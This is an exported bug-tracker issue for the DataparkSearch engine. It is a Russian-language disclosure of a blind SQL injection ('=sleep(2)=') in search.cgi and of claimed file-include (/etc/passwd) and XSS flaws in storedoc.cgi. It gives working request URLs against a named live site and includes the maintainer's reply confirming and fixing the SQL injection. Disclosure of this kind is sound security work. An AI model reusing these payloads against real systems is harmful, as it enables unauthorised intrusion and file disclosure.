Letractively / dataparksearch

Automatically exported from code.google.com/p/dataparksearch
GNU General Public License v2.0
0 stars 0 forks source link

SQL injection, XSS, Cross Site Scripting, File Include #44

Open GoogleCodeExporter opened 8 years ago

GoogleCodeExporter commented 8 years ago
What steps will reproduce the problem?
1.File Include

В фаиле storedoc.cgi

Чтение фаилов: /etc/passwd

в GET параметре DU чтение фаила file:///etc/passwd
/kurgan/cache?CS=UTF-8&CT=text/html&DM=Sat,%2017%20Mar%202012,%2006:59:51%20YEKT
&DS=48515&DU=file%3a%2f%2f%2fetc%2fpasswd&L=tr&label=&q=1&rec_id=1332401146

2.Blind SQL Injection

В фаиле search.cgi
'=sleep(2)=' URL encoded GET в параметре cmd, GroupBySite, np, s, 
site 
/kurgan/s?cmd=%25D0%259D%25D0%25B0%25D0%25B9%25D1%2582%25D0%25B8%27%3dsleep%282%
29%3d%27&GroupBySite=yes&np=0&q=1&s=DRP&syn=1

Выполняемый запрос:
INSERT INTO qinfo (q_id,name,value) VALUES 
(82971,'cmd','%D0%9D%D0%B0%D0%B9%D1%82%D0%B8'=sleep(2)='')

3. Cross Site Scripting

В фаиле storedoc.cgi

Загрузка произвольной страницы из 
интернета и возможность выполнения JavaScript 
кода

http://kurganland.ru/kurgan/cache?CS=UTF-8&CT=text/html&DM=Sat,%2017%20Mar%20201
2,%2006:59:51%20YEKT&DS=48515&DU=http://himic.ru/xss.html&L=tr&label=&q=1&rec_id
=1332401146

Выполнение:
http://kurganland.ru/kurgan/cache?DU=http://himic.ru/xss.html

Подробнее: 
http://blog.himic.ru/HiMiC/2012/07/31/dataparksearch-engine-sql-injection-xss-cr
oss-site-scripting-file-include.html

Original issue reported on code.google.com by HIM...@YANDEX.RU on 27 Aug 2012 at 9:48

Attachments:

GoogleCodeExporter commented 8 years ago
Пункт 2 подтвержден, фикс залит в 
SVN-репозиторий (ревизия 758).

Пункты 1 и 3 не подтверждаются. Параметр DU в 
шаблоне stortedoc, входящем в дистрибутив, 
используется только в тэге BASE, который 
используется браузером для разрешения 
относительных ссылок, поэтому если вы 
указываете в нем URL со схемой file:, то 
обращаться к указанному файлу брайзер 
будет на компьютере с браузером, а не с 
dpsearch. Ворзможно на kurganland.ru используется 
нестандартная версия шаблона storedoc.

Original comment by dp.max...@gmail.com on 27 Aug 2012 at 1:40